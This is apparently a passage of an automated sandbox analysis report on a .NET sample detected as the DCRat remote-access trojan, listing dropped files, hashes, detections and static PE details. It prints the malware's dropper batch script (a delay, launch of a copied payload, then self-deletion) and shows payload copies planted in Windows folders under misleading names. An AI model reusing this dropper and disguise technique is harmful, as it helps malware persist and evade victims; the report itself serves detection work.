                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                              C:\Users\user\AppData\Local\Temp\YswW7Dcfvg

                              Download File
                              Process:C:\Users\user\Desktop\dmhu7oz5yP.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):25
                              Entropy (8bit):4.243856189774724
                              Encrypted:false
                              SSDEEP:3:hOHpocGu:QJB5
                              MD5:7037E45721B6495FE860E8DC26E27612
                              SHA1:888C35290F69ADA4B5FEFCD106FB0FC272458C77
                              SHA-256:BDA7DB386772809D23C72715279A3785326CE87FF541BA4759573892192CA74E
                              SHA-512:B83BE581664E2765F8478137AC77F5BC4304B048F6B5006406F5B1A51C6AE3095AA4AEF3F8C68805EF466DB2FE1B4B9565859B21D457E3727FBE086DC40CDDF4
                              Malicious:false
                              Preview:77CBr4XOYJTMytzDox48y8LOK

                              C:\Users\user\AppData\Local\Temp\ZBWGzntvdU.bat

                              Download File
                              Process:C:\Users\user\Desktop\dmhu7oz5yP.exe
                              File Type:DOS batch file, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):202
                              Entropy (8bit):5.228933567824266
                              Encrypted:false
                              SSDEEP:6:hITg3Nou11r+DE77hcejgvKOZG1wkn23ft1RiG:OTg9YDE79jgDfrRp
                              MD5:272CB590CDC2BFE6D906176FA2EE05A4
                              SHA1:10F1F7CD88AF417E6AA4167DCB58A19B1454DF1D
                              SHA-256:86697A47D6A288EBF6DBB4C9173FE474983F51E30C5C0E81AC8A4B6AF3EC60B6
                              SHA-512:5A4D2C9C17F1DA0539A8873B5DE1EE34982E668965CF72C3FCC885F203FCC373B400FD50CB90E92E109E96EF135A42141E1AF4C20DA625595688B1BE6AFDD59D
                              Malicious:true
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              Preview:@echo off..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 1>nul..start "" "C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\ZBWGzntvdU.bat"

                              C:\Windows\Help\OEM\ContentStore\7bcc3440f42388

                              Download File
                              Process:C:\Users\user\Desktop\dmhu7oz5yP.exe
                              File Type:ASCII text, with very long lines (914), with no line terminators
                              Category:dropped
                              Size (bytes):914
                              Entropy (8bit):5.894794459139507
                              Encrypted:false
                              SSDEEP:24:4ETe7fETXyfV4jZhIUJCjh5gIj4DKR3gn9j5:9TTTAG/a1j7wn99
                              MD5:B76181C0BE1CD9383832E248E80422ED
                              SHA1:C32647AA117CF94309475302224A9EFF6733E281
                              SHA-256:1A8E4EC9E18091BAF91C73AD0944E57029E89D3AF094FD5F4065EA15065201A8
                              SHA-512:2BE23FE96D15A15C765323F58B0FB6A62B69E03173D48BA742942288E78958F69E06E68D573026631525CF0B65D867B6B5F49B6B751B88246968C764E151FBBC
                              Malicious:false
                              Preview:MSyaQtgRtP2RlBLLxuSIZCINDnbtwSOCRob03OhvnsmZ9llnyof9BsfJKkWmSxfaB0A6jVRiNgfrasObCy5HwOAiJSqS14d0NLYIloDdW6wfNysbV5kd1Xow0bxQo9rSCpePUGzXucvzcfVVkO66UA8zglSK1wyXPdciUcHPFNsZlyUVGbqZCv8Cqossypf8nYk8CxBHHr0GSjNsR6EZGZVeeZ1puZbaruvNOVSSajSU41uHaAa1lF2OCFdn6VXrPaZhyAd5ov9gGAjmptPt9kyl2gKI1pWFMkEdcMTaheM0GVHCg07MFnsplypRzVD9Y4Tg5FKdZzMeX8egYImArK9i2Z2ngCkLaNcMClHaqewQbNSnTJ2qsCRO4ungNg6XOADKgSewBMUNXtHoGOUXJ4dX5NRR8kMJiZBbKHHBpFpgsE0Ln9Z9MiOUgqOSAMyaALp8rpe9HTsDO6p1XGn8LM79Kr4d2yAcROggY2d8eZ130KFkAX54izPxOpxAuAGSSPwAaIcempevVEJ9lUdf3G3b8tSsEdNeTjkkYEJ14aR3VecKgxZZhlYLWUBr0tZJb9cvdjkgLlkdyAFeRIMREx7rKYNEDcBKAIbVCqq6M2O5A5XVOgZshIEnCukEVgdskadpiuckbPELjBrPB2zgCSn1EySRFmlpZfUkbrxeEyQRE3EACVCdr6qRxmlubKfzoYwDrHxUEVcNBVwKtRPujH8czCxzFCC3TbmpGBT5hsYWecQbzaAJ5vPhZTNoT7PCSi3jtHEs8TM1tm7XwVAoC38iMFQxxoljcWD6iqrrWRLmiXxxV0287kAZkVXn0Q5UrmYWjByGnSRusV9yRcb7wnm2WoWNSD1FW0559bOUCvUoSPrOViWXz8hDAgA4plxjbMX1aEz0OG4AT7jG6H

                              C:\Windows\Help\OEM\ContentStore\jnTUlYyDyuybgXdgxhTkT.exe

                              Download File
                              Process:C:\Users\user\Desktop\dmhu7oz5yP.exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):323072
                              Entropy (8bit):5.759825134174161
                              Encrypted:false
                              SSDEEP:6144:P54y2oo7KrA7bRCgxHV4casxgZ0BBxxqHsyQK4M0dxVbhaLr9u:P72N7J5FHVGZ0AQZRdx8Z
                              MD5:ED9312F79BD3E7F4BEB41E56EA82512E
                              SHA1:213D531F2CA1543ECC1AF3AD2B7FE56B4B027BFE
                              SHA-256:786B9891BC5CA12D44F2DF1A978F675693647EAED50DA66B92BDBD3C290BCA88
                              SHA-512:E057055CADB37DD8EE8F4C0308B19C8B19FA6274064C54B1927EC23DD80EEC2C952E1F35F54B8E4B60B7E128B23940FF13C460EE5CF85E20EEB5AA217FDAF4E3
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 79%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb..........".................~.... ... ....@.. .......................`.......^....@.................................,...O.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................`.......H.......H...............................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                              C:\Windows\Help\OEM\ContentStore\jnTUlYyDyuybgXdgxhTkT.exe:Zone.Identifier

                              Download File
                              Process:C:\Users\user\Desktop\dmhu7oz5yP.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):26
                              Entropy (8bit):3.95006375643621
                              Encrypted:false
                              SSDEEP:3:ggPYV:rPYV
                              MD5:187F488E27DB4AF347237FE461A079AD
                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                              Malicious:false
                              Preview:[ZoneTransfer]....ZoneId=0

                              C:\Windows\Media\WinStore.App.exe

                              Download File
                              Process:C:\Users\user\Desktop\dmhu7oz5yP.exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):323072
                              Entropy (8bit):5.759825134174161
                              Encrypted:false
                              SSDEEP:6144:P54y2oo7KrA7bRCgxHV4casxgZ0BBxxqHsyQK4M0dxVbhaLr9u:P72N7J5FHVGZ0AQZRdx8Z
                              MD5:ED9312F79BD3E7F4BEB41E56EA82512E
                              SHA1:213D531F2CA1543ECC1AF3AD2B7FE56B4B027BFE
                              SHA-256:786B9891BC5CA12D44F2DF1A978F675693647EAED50DA66B92BDBD3C290BCA88
                              SHA-512:E057055CADB37DD8EE8F4C0308B19C8B19FA6274064C54B1927EC23DD80EEC2C952E1F35F54B8E4B60B7E128B23940FF13C460EE5CF85E20EEB5AA217FDAF4E3
                              Malicious:true
                              Yara Hits:
                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Windows\Media\WinStore.App.exe, Author: Joe Security
                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Windows\Media\WinStore.App.exe, Author: Joe Security
                              • Rule: MALWARE_Win_DCRat, Description: DCRat payload, Source: C:\Windows\Media\WinStore.App.exe, Author: ditekSHen
                              • Rule: MALWARE_Win_DCRat, Description: DCRat payload, Source: C:\Windows\Media\WinStore.App.exe, Author: ditekSHen
                              • Rule: MALWARE_Win_DCRat, Description: DCRat payload, Source: C:\Windows\Media\WinStore.App.exe, Author: ditekSHen
                              • Rule: MALWARE_Win_DCRat, Description: DCRat payload, Source: C:\Windows\Media\WinStore.App.exe, Author: ditekSHen
                              • Rule: MALWARE_Win_DCRat, Description: DCRat payload, Source: C:\Windows\Media\WinStore.App.exe, Author: ditekSHen
                              • Rule: MALWARE_Win_DCRat, Description: DCRat payload, Source: C:\Windows\Media\WinStore.App.exe, Author: ditekSHen
                              • Rule: MALWARE_Win_DCRat, Description: DCRat payload, Source: C:\Windows\Media\WinStore.App.exe, Author: ditekSHen
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 79%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb..........".................~.... ... ....@.. .......................`.......^....@.................................,...O.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................`.......H.......H...............................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                              C:\Windows\Media\WinStore.App.exe:Zone.Identifier

                              Download File
                              Process:C:\Users\user\Desktop\dmhu7oz5yP.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):26
                              Entropy (8bit):3.95006375643621
                              Encrypted:false
                              SSDEEP:3:ggPYV:rPYV
                              MD5:187F488E27DB4AF347237FE461A079AD
                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                              Malicious:true
                              Preview:[ZoneTransfer]....ZoneId=0

                              C:\Windows\Media\fd168b19609dff

                              Download File
                              Process:C:\Users\user\Desktop\dmhu7oz5yP.exe
                              File Type:ASCII text, with very long lines (590), with no line terminators
                              Category:dropped
                              Size (bytes):590
                              Entropy (8bit):5.877283291275858
                              Encrypted:false
                              SSDEEP:12:SdZRiBwDepP2ZzPg5c2tPpflr+kQTUKFS5NfUPI7aZrEVJ3e:Sdaf2ZzPg5PflrKcK/ZgXO
                              MD5:A974FD3BE183A3A8B1D11A1330C90EFD
                              SHA1:919E209AAA203F20C1AF8CF7FCAD3C87A0465C2D
                              SHA-256:CE537377ACF9A9AC9AC5029ABC15DF41147A873CCF189717047CC18C601E2790
                              SHA-512:B853F87786BEC5B9B4B371811039E9A9ACBCFA0EE61FFD679F0C46B2364FE292158072A709B7FCFFAA67C1A6E2D7DF3896D1B3B9B18CA10BA35346C0A54E1051
                              Malicious:false
                              Preview:43BXIJeX8xod6msK2Z9MQTMlrXfnmGmejn3fzYAlLrD8To4tADShJPUlqaqun1v2LJ4TsMVdYYBiQNSCdwnjxFVTSSyYsP7U5LxJukBxszJvOvVdIoR1NMFFykAZX6vIaqmEZIR2vz176jFh7VQE8GGtGsUJklavEAVhIQE9WYGXVHJPecbCpqJTk38ryIRJZF35OiYrQRsjAtY8iFpHJYFX1B6PRXLOG68POOA5EuvY8jT0eAIscJ9AAgEMlJa2FedDuIuUEtDZmqYRsGuQOcv667PsJxU4T2TeGPGWPyntGkYTHwefYJnnsgHw3CKQZIFtX4KdAYBayB0Wj6kXTygKOqvkHTcNnXU7eo6NmBf9INyrpvN7bx7km5erIkVq5xwbr3159XvSTgCB1E4WGfv0ZtUjJOEBpyDUaW9v3R7ECpRF2dzDp8kZB6C7jSwvStmecrleEJdyiryucOqpZBVrOoSdUCMleMvSDxmL1U9gfv1UIRfUlGWRX5QyYHKC61TW5frplfyECzLcw8VCh29Yze4IgywuK6knceYnkzsGSROityBZwHeE25gakjIxsE3FOhASkscrJ3

                              C:\Windows\Migration\WTR\7bcc3440f42388

                              Download File
                              Process:C:\Users\user\Desktop\dmhu7oz5yP.exe
                              File Type:ASCII text, with very long lines (670), with no line terminators
                              Category:dropped
                              Size (bytes):670
                              Entropy (8bit):5.906598116528062
                              Encrypted:false
                              SSDEEP:12:0Q+hSN8NdU1a+l8L8Y+leTD2caTUffJzerOS/zSDg28p7yf1rpqRRXvmYlDM89I:0NDNdsI0cYU3lpz8p7yf1rpqRFmyM89I
                              MD5:03C3E11CA064B99EF485E090D8A33095
                              SHA1:262168D885AD6938B04A6AD0F45DB420AB7C82EA
                              SHA-256:09CA050F1ABCCA6E947DCB05345E3556DC69E5CD8445F0F022F8F3C885789CC5
                              SHA-512:CB7418A917AC9D999CF2D82CB7A59FF259BE6306D94AFEDEF5E30CAC402BB36EBDC623B39CE0C2D38543F17C879C9E16E8ED64BBD50B5E47828E51FB65796AF7
                              Malicious:false
                              Preview:a8uMG20yRtgJsDhuC638htD2868iiIWZ5beBjudOGTkBLThVvH2ggUHr51OK3SPIWGNRifKRdp2OJBroYnwbQ02lTxGrgTUyDboEGQwP6kD0c3h3KjvQfy2gNm7vZdvKVEKsXmiI1hepwCIaPMg6hESPiI1eSAzcz3fYszgiBnY8UMtLdhgN7ymRv5JPvDz0rB03gusaq843pU4VYpAvdmfAQOmwpRw7xiQSW0otyGg84slbAy1FDEWEf0mSH5uZL6GHDm9hBQ6XGgGhmLv1Zr4sLLwfNVm3VHx7meXYyTExI988uFp5K39eCX51zdUpnDC8tJ5IxWCGnHkMNxvIpqscIT4OifiV8YJE6APlKhIx0205wtoBrM97Uk0ZOqkRxqHO8gPNiK8Ii4lPc9cy1hnwYMtWJzWd609Kul6QebdhN1YZ9k7ONvaQCV0ww2DtxeLs4af0CLUaEGihxTXi2HQLZtHZvKelYuttpqfiFGMBbAM6wS8cee0pNASLTFE1rsBUXy2Hyzcv5OtZhKndMBH33DfoXTOABUTt82i7Z0npBEu9Q3oIclpqlIaTTNufkcuk4AaompDVYb1yTgXeoFhapnIzbOoMGIEiUJFQc9gwhTSJQmAwzQ0f4U5Q1lNXB1OQWSdJaHBpiv2VV8jzO1W0RjoANy

                              C:\Windows\Migration\WTR\jnTUlYyDyuybgXdgxhTkT.exe

                              Download File
                              Process:C:\Users\user\Desktop\dmhu7oz5yP.exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):323072
                              Entropy (8bit):5.759825134174161
                              Encrypted:false
                              SSDEEP:6144:P54y2oo7KrA7bRCgxHV4casxgZ0BBxxqHsyQK4M0dxVbhaLr9u:P72N7J5FHVGZ0AQZRdx8Z
                              MD5:ED9312F79BD3E7F4BEB41E56EA82512E
                              SHA1:213D531F2CA1543ECC1AF3AD2B7FE56B4B027BFE
                              SHA-256:786B9891BC5CA12D44F2DF1A978F675693647EAED50DA66B92BDBD3C290BCA88
                              SHA-512:E057055CADB37DD8EE8F4C0308B19C8B19FA6274064C54B1927EC23DD80EEC2C952E1F35F54B8E4B60B7E128B23940FF13C460EE5CF85E20EEB5AA217FDAF4E3
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 79%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb..........".................~.... ... ....@.. .......................`.......^....@.................................,...O.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................`.......H.......H...............................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                              C:\Windows\Migration\WTR\jnTUlYyDyuybgXdgxhTkT.exe:Zone.Identifier

                              Download File
                              Process:C:\Users\user\Desktop\dmhu7oz5yP.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):26
                              Entropy (8bit):3.95006375643621
                              Encrypted:false
                              SSDEEP:3:ggPYV:rPYV
                              MD5:187F488E27DB4AF347237FE461A079AD
                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                              Malicious:false
                              Preview:[ZoneTransfer]....ZoneId=0

                              C:\Windows\SoftwareDistribution\7bcc3440f42388

                              Download File
                              Process:C:\Users\user\Desktop\dmhu7oz5yP.exe
                              File Type:ASCII text, with very long lines (960), with no line terminators
                              Category:dropped
                              Size (bytes):960
                              Entropy (8bit):5.912156307346969
                              Encrypted:false
                              SSDEEP:24:AqcTABJnSEgO8daW+d94JhQDJ0ssij6+7V5:AVqoOKaWK+oDqssiW+7b
                              MD5:AEAA919B48E9C07A2CC5571EA4AA0B17
                              SHA1:4D42F079C049081E606D2484F91A862A02BE066F
                              SHA-256:4FF930AD21EC1F6189A5E87B9DC5CD28C86E96A4A95C2AEF5987FAE1F5879680
                              SHA-512:CA39A6D194709B415D698A318C513CD098E28FA08ECFBA77D1AA70F90839C6D6AF67AF2A0B9E724DBC259BAF098DFC7AD48262426B245EEAC7904037ACC0A5A6
                              Malicious:false
                              Preview:53cKxYQd0gFdm4HS7tCOaA7FijM8D30XU7AH2H8hzNrURM3ACJ0EFhg45WlNMSa6qsJp39Z0ufYMTmyWpM54DvSwaGLgfvUhxuojDOGDt9UjJUkTiPi9Xg34aWOxy3U9K1Zi7OSaF1KDbsnGf28QNVJR1uJqATO0pVZR4BVT6H4fVzcstIR55DwzrHrNFmavnTXGSVLdgoTFbo5CRa62CS5likjxUINUqI2CbVZY6yZQuqYDLp5pqitUYwhswXIYb9YSv3k6Bh5N3o12MflpNinIYinpxqmipBzvRFRRE9nImfat5pgQwdK2VP4NP5IU5Wi2zFkGOUlN4ef3H4uIKVwM06ZBLEBI0SMQ7i3zEZCc2670tAGVL9KjjWB2qi5JScXlRP5jA4DuTUT39iRK7q71InqkgBJge2JajVjeEgUQ6aQOCI3HQvMlefdoiVC9vhPbK3Tn9xFbWr5sXbiXHBPtqi5E245tdUeZKyDIzPHdpuPwkvRGwp1tRgum8PvF1V7CMfiiXZi24wD5TIdHmz6ycvHnDbKkeClUxNkEMtsWG9zedzTzvncCYIjbX4e6P8X1LtHFiY43Gjsd5nKOHUy0kj5pnJqSOwHHm7TusNRWti6yaGfuuQz5KgRlxccZrmoUck08Tag3DbHBmGPhn6h87L7Fqr6Pv2oH3mVzPhaUu52sYQ8qM4vvEqXQmvSmdQILwAHAuZSGfNOBTPqasPC0G3DNOFNePy0dwr5YI86xmpP0cV6XE23ONRE374vpMx0rXuOmTSRuTPOanMu3I0ZX4mQfmCbNMQkyzidrGUDwkI47DoPuJ2hWYdwuetAR0EiDoZlFtDwxwnxvrSb8wrDTsOaVvsNXTw5gk1ToCKAGFtjuqBDLRCeJAOUZ8PUBzZeAsQLz9x5mq7O8pqpuoBGRSvfVg3pxz8RpPjBZzNMdH1dDAVuRjjXxTMs7vzTF

                              C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe

                              Download File
                              Process:C:\Users\user\Desktop\dmhu7oz5yP.exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):323072
                              Entropy (8bit):5.759825134174161
                              Encrypted:false
                              SSDEEP:6144:P54y2oo7KrA7bRCgxHV4casxgZ0BBxxqHsyQK4M0dxVbhaLr9u:P72N7J5FHVGZ0AQZRdx8Z
                              MD5:ED9312F79BD3E7F4BEB41E56EA82512E
                              SHA1:213D531F2CA1543ECC1AF3AD2B7FE56B4B027BFE
                              SHA-256:786B9891BC5CA12D44F2DF1A978F675693647EAED50DA66B92BDBD3C290BCA88
                              SHA-512:E057055CADB37DD8EE8F4C0308B19C8B19FA6274064C54B1927EC23DD80EEC2C952E1F35F54B8E4B60B7E128B23940FF13C460EE5CF85E20EEB5AA217FDAF4E3
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 79%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb..........".................~.... ... ....@.. .......................`.......^....@.................................,...O.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................`.......H.......H...............................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                              C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe:Zone.Identifier

                              Download File
                              Process:C:\Users\user\Desktop\dmhu7oz5yP.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):26
                              Entropy (8bit):3.95006375643621
                              Encrypted:false
                              SSDEEP:3:ggPYV:rPYV
                              MD5:187F488E27DB4AF347237FE461A079AD
                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                              Malicious:true
                              Preview:[ZoneTransfer]....ZoneId=0

                              \Device\Null

                              Download File
                              Process:C:\Windows\System32\w32tm.exe
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):151
                              Entropy (8bit):4.8236554554921875
                              Encrypted:false
                              SSDEEP:3:VLV993J+miJWEoJ8FXA3MzrckdNvpsPLyXKNvj:Vx993DEUt3FkiPLy8
                              MD5:03B18B6423EEDD39B46A7DEA5886C42C
                              SHA1:FE70A8FB13DD1E6AEE9E6DF35AC793F248B9690E
                              SHA-256:A4734EA59A8C078771B33E271E1CD37AB12A98BFD9D522B0CD15433BD0BD58C7
                              SHA-512:8F78CC61FA488A077279946854B7264899D076653A5FD20504F3447F002F1C279CDF1B0E7E65177740E5550C0B0892E1EA473F08570827631FA70E21EF98537C
                              Malicious:false
                              Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 31/08/2024 06:07:39..06:07:39, error: 0x80072746.06:07:44, error: 0x80072746.

                              Static File Info

                              General

                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Entropy (8bit):5.759825134174161
                              TrID:
                              • Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                              • Win32 Executable (generic) a (10002005/4) 49.75%
                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                              • Windows Screen Saver (13104/52) 0.07%
                              • Win16/32 Executable Delphi generic (2074/23) 0.01%
                              File name:dmhu7oz5yP.exe
                              File size:323'072 bytes
                              MD5:ed9312f79bd3e7f4beb41e56ea82512e
                              SHA1:213d531f2ca1543ecc1af3ad2b7fe56b4b027bfe
                              SHA256:786b9891bc5ca12d44f2df1a978f675693647eaed50da66b92bdbd3c290bca88
                              SHA512:e057055cadb37dd8ee8f4c0308b19c8b19fa6274064c54b1927ec23dd80eec2c952e1f35f54b8e4b60b7e128b23940ff13c460ee5cf85e20eeb5aa217fdaf4e3
                              SSDEEP:6144:P54y2oo7KrA7bRCgxHV4casxgZ0BBxxqHsyQK4M0dxVbhaLr9u:P72N7J5FHVGZ0AQZRdx8Z
                              TLSH:27645A2833EC4B19F1BE6BB5D4B3515997B1F46AFA7EEB0E4D8150DA1826340DC00BA7
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....rb..........".................~.... ... ....@.. .......................`.......^....@................................

                              File Icon

                              Icon Hash:90cececece8e8eb0

                              Static PE Info

                              General

                              Entrypoint:0x45057e
                              Entrypoint Section:.text
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                              Time Stamp:0x6272A3D7 [Wed May 4 16:03:35 2022 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:4
                              OS Version Minor:0
                              File Version Major:4
                              File Version Minor:0
                              Subsystem Version Major:4
                              Subsystem Version Minor:0
                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                              Entrypoint Preview

                              Instruction
                              jmp dword ptr [00402000h]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al

                              Data Directories

                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0x5052c0x4f.text
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x520000x218.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x540000xc.reloc
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
